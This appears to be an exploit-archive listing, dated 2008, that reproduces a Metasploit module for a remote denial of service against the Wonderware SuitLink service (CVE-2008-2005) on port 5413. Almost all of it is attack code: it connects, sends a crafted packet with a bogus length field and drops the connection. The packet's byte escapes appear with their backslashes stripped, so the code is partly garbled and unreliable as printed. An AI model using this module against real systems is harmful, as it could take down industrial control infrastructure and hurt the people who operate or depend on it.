[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : WonderWare SuiteLink 2.0 Remote Denial of Service Exploit (meta)
# Published : 2008-09-17
# Author : belay tows
# Previous Title : fhttpd 0.4.2 un64() Remote Denial of Service Exploit
# Next Title : QuickTime 7.5.5 / ITunes 8.0 Remote off by one Crash Exploit
##
# $Id: suitlink.rb $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##
require 'msf/core'
module Msf
class Auxiliary::Dos::Windows::Wonderware::SuitLink < Msf::Auxiliary
include Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Wonderware SuitLink Denial of Service',
'Description' => %q{
This module exploits a denial of service vulnerability
within the SuitLink service in Wonderware products.
},
'Author' => [ 'belay tows' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 1 $',
'References' =>
[
[ 'BID', '28974' ],
[ 'CVE', '2008-2005' ],
],
'DisclosureDate' => 'May 05 2008'))
register_options([Opt::RPORT(5413),], self.class)
end
def run
connect
print_status("Sending DoS packet...")
dos_length = 0xBAADF00D
pkt = "xD5xCFxC7xF8x0BxCDxD3x11xAAx10x00xA0xC9xECxFDx9F"
pkt << Rex::Text.rand_text_alpha(0x14) + "x00x00"
pkt << [dos_length].pack("V")
len = [pkt.length].pack("C")
sock.put(len)
sock.put(pkt)
sleep 15 # wait to avoid thread shutdown event
disconnect
end
end
end
# www.Syue.com [2008-09-17]